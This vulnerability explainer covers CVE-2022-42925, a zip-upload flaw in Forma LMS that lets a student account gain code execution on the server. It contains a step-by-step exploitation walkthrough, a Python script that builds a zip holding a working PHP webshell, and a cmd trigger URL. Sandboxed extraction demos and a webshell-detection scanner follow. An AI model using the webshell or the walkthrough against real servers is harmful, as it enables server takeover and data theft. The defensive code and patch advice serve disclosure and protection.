CVE-2022-42925 is a critical vulnerability in Forma LMS (Learning Management System) version 3.1.0 and earlier. At first glance it may sound like just another technical bulletin, but if you run Forma LMS for online education or corporate training, this flaw deserves attention: a student account, one of the lowest-privileged roles in the system, can become an attacker's gateway to full system compromise, and the entry point is a seemingly harmless zip file upload.
This article will walk you through what CVE-2022-42925 is, explain how privilege escalation happens, show you what exploiting it looks like (with code), and point you to the original sources for more info.
What Is CVE-2022-42925?
The root of CVE-2022-42925 is the way Forma LMS handles plugin zip uploads. The plugin upload component, intended for administrators and teachers, should only let privileged users add widgets or extensions. It turns out, however, that an authenticated student can reach this feature, and Forma LMS does not properly sanitize or restrict the extraction location or the contents of uploaded zip files.
This "zip slip" style flaw lets a student upload a zip file containing malicious PHP code, which the LMS extracts straight into a web-accessible directory. Because the plugin directory itself is served by the web server, the archive does not even need a ../ traversal entry: a PHP file at the archive root is enough. The attacker's next step is simple: visit the file's URL and the PHP code runs, allowing anything from data theft to full server takeover.
Where’s the Proof?
- Security Advisory (GitHub)
- NIST NVD Entry
- Forma LMS Changelog
Exploitation Walkthrough
1. Log in as a student (any valid credentials will do).
2. Access the plugin upload feature, either directly (if there is no access control) or via a crafted request.
3. Upload the malicious zip via the plugin upload form.
4. Let the server extract the archive into the web-accessible plugin directory.
5. Run your payload: browse to https://your-forma-lms/plugins/evil.php
Below is a Python example of creating a zip containing a simple PHP webshell:
import zipfile

# Simple PHP webshell: runs whatever the "cmd" request parameter contains
shell_code = """<?php
if(isset($_REQUEST['cmd'])){
    echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>"""

# Save the webshell as evil.php
with open('evil.php', 'w') as f:
    f.write(shell_code)

# Put evil.php in a zip archive
with zipfile.ZipFile('plugin-shell.zip', 'w') as zipf:
    # Place the file at the root of the archive so it lands directly in the
    # plugin directory; adjust the path if Forma LMS extracts elsewhere.
    zipf.write('evil.php', arcname='evil.php')

print('Malicious plugin-shell.zip created.')
Now upload plugin-shell.zip through the plugin upload interface.
What Happens Next?
If the server extracts the zip without checking paths, file names or file types, the attacker's evil.php becomes reachable through the Forma LMS website, giving command execution from a browser.
Example:
https://your-forma-lms/plugins/evil.php?cmd=whoami
This returns the account the PHP process runs as (typically the web server's user, such as www-data), a classic sign of remote code execution. Note that the shell runs with that user's privileges, not root; taking over the rest of the server from there is a separate step.
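The article describes the vulnerable behaviour (trusting member names and file types when extracting an uploaded zip) but does not show the extraction code. The following Python block is an added illustration, not code from Forma LMS (which is written in PHP) or from the original article: it puts the vulnerable extraction pattern beside a hardened one and runs both on a constructed archive inside a temporary sandbox. The archive contents, directory layout and the helper names (UnsafeArchive, extract_safe, is_safe_member) are assumptions made for the example.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

# Extensions the web server would execute; none belong in an archive that a
# low-privilege account is allowed to submit.
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".phar", ".php3", ".php5", ".php7", ".phps"}


class UnsafeArchive(ValueError):
    """Raised when an uploaded archive must not be extracted at all."""


def build_sample_zip(include_attack=True):
    """Constructed sample upload (not a real Forma LMS plugin). With include_attack
    it adds a PHP file at the root and a zip-slip entry climbing three levels up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.xml", "<plugin name='demo'/>")
        zf.writestr("theme/style.css", "body { margin: 0 }")
        if include_attack:
            zf.writestr("evil.php", "<?php system($_GET['cmd']); ?>")
            zf.writestr("../../../htdocs/escaped.php", "<?php ?>")
    return buf.getvalue()


def extract_unsafe(data, dest):
    """The vulnerable pattern: every member name is trusted, so '..' walks out
    of dest and a '.php' member lands where the web server will run it."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = dest / info.filename  # no normalisation, no containment check
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target.resolve())
    return written


def check_member(name, dest):
    """Reject one archive member if it could escape dest or be executed."""
    dest = Path(dest).resolve()
    if os.path.isabs(name) or "\\" in name:
        raise UnsafeArchive(f"absolute or backslash path: {name!r}")
    target = (dest / name).resolve()
    if target != dest and dest not in target.parents:
        raise UnsafeArchive(f"path escapes destination: {name!r}")
    # Check every suffix, so 'evil.php.png' is caught as well as 'evil.php'.
    if {s.lower() for s in Path(name).suffixes} & EXECUTABLE_SUFFIXES:
        raise UnsafeArchive(f"executable file type: {name!r}")


def is_safe_member(name, dest):
    try:
        check_member(name, dest)
        return True
    except UnsafeArchive:
        return False


def extract_safe(data, dest):
    """Hardened extraction: validate every member first and write nothing if any
    member fails, so a rejected archive leaves no partial files behind."""
    dest = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = [m for m in zf.infolist() if not m.is_dir()]
        for info in members:
            check_member(info.filename, dest)
        written = []
        for info in members:
            target = dest / info.filename
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def demo():
    """Run both extractors inside a throwaway sandbox and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        sandbox = Path(tmp).resolve()
        # Nest the plugin directory so the '../../../' entry stays inside the sandbox.
        plugins = sandbox / "htdocs" / "forma" / "plugins"
        plugins.mkdir(parents=True)
        unsafe_paths = extract_unsafe(build_sample_zip(), plugins)
        try:
            extract_safe(build_sample_zip(), sandbox / "safe")
            safe_error = None
        except UnsafeArchive as exc:
            safe_error = str(exc)
        clean = extract_safe(build_sample_zip(include_attack=False), sandbox / "clean")
        return {
            "unsafe_escaped": [str(p.relative_to(sandbox)) for p in unsafe_paths
                               if plugins not in p.parents],
            "safe_error": safe_error,
            "clean_written": sorted(str(p.relative_to(sandbox / "clean")) for p in clean),
        }
```

Running demo() shows the unsafe extractor writing htdocs/escaped.php outside the plugin directory (and evil.php inside it), while the hardened extractor rejects the same archive before writing a single byte and still accepts the clean one. The two checks that matter are the containment test on the resolved path and the suffix allow/deny decision; note that checking only the last suffix would let evil.php.png through on servers that execute by the first extension.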
Why This Matters
- Easy to automate: the attack can be scripted and scaled.
- Sensitive data at risk: user data, administrator credentials and system files are all exposed.
Responsible Disclosure
Forma LMS maintainers were contacted and patched this as of version 3.1.1.
- Users are urged to upgrade immediately.
- If you can't upgrade, disable plugin uploads or restrict access to the feature as much as possible.
- Monitor the plugins/ folder on the web server for unexpected PHP files.
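Turning the last bullet into something you can run: the following Python script is an added example, not part of Forma LMS or of the original article. It takes a hash baseline of the plugins/ tree after a clean install or upgrade and later flags executable files that were not in the baseline, files whose content changed, and files containing webshell-style calls. The directory names, file contents and the indicator regular expression are constructed for the example; because legitimate Forma plugins are PHP as well, the baseline is what turns "a PHP file" into "a PHP file nobody installed".

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Dangerous PHP calls fed straight from request parameters, or eval() of
# decoded/request data: typical of dropped webshells, rare in real plugins.
WEBSHELL_RE = re.compile(
    rb"\b(shell_exec|passthru|system|exec|popen|proc_open)\s*\(\s*\$_(REQUEST|GET|POST)"
    rb"|\beval\s*\(\s*(base64_decode|\$_(REQUEST|GET|POST))",
    re.IGNORECASE,
)
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".phar", ".php3", ".php5", ".php7"}


def sha256_of(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(plugins_dir):
    """Hash every file under plugins/ right after a clean install or upgrade."""
    return {
        str(p.relative_to(plugins_dir)): sha256_of(p)
        for p in sorted(plugins_dir.rglob("*")) if p.is_file()
    }


def scan_plugins(plugins_dir, baseline):
    """Return (relative_path, reason) pairs for files that need a look."""
    findings = []
    for p in sorted(plugins_dir.rglob("*")):
        if not p.is_file():
            continue
        rel = str(p.relative_to(plugins_dir))
        executable = bool({s.lower() for s in p.suffixes} & EXECUTABLE_SUFFIXES)
        if rel not in baseline:
            if executable:
                findings.append((rel, "executable file not in baseline"))
        elif baseline[rel] != sha256_of(p):
            findings.append((rel, "file changed since baseline"))
        if executable and WEBSHELL_RE.search(p.read_bytes()):
            findings.append((rel, "webshell indicator in content"))
    return findings


def demo():
    """Constructed plugins/ tree: take a clean baseline, then reproduce the
    post-exploitation state the article describes (a new evil.php plus a
    backdoored plugin file) and scan again."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "plugins"
        (plugins / "reports").mkdir(parents=True)
        (plugins / "reports" / "init.php").write_bytes(b"<?php function init() { return true; } ?>")
        (plugins / "reports" / "style.css").write_bytes(b"body { margin: 0 }")
        baseline = build_baseline(plugins)
        before = scan_plugins(plugins, baseline)
        (plugins / "evil.php").write_bytes(
            b"<?php if(isset($_REQUEST['cmd'])){ echo shell_exec($_REQUEST['cmd']); } ?>")
        (plugins / "reports" / "init.php").write_bytes(b"<?php eval(base64_decode($_POST['p'])); ?>")
        (plugins / "reports" / "style.css").write_bytes(b"body { margin: 0; color: red }")
        return {"before": before, "after": scan_plugins(plugins, baseline)}
```

Store the baseline somewhere the web server's account cannot write (the webshell runs as that account, so a baseline kept inside the web root can be edited by the attacker), and re-run the scan from cron or your monitoring agent. The content regex is deliberately narrow so that it does not page you for every plugin that calls system(); a new or changed file is reported regardless of content.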
Final Thoughts
CVE-2022-42925 is proof that even “safe” user roles in your LMS can be dangerous if upload components are not rigorously protected. If you use Forma LMS, patch it now—before a student turns superuser on your server.
Original References
- FormaLMS GitHub advisory
- NVD: CVE-2022-42925
- Forma LMS Official Site
Stay safe, stay patched, and always be cautious with file uploads—even from your “trusted” students!
Timeline
Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 17:30:00 UTC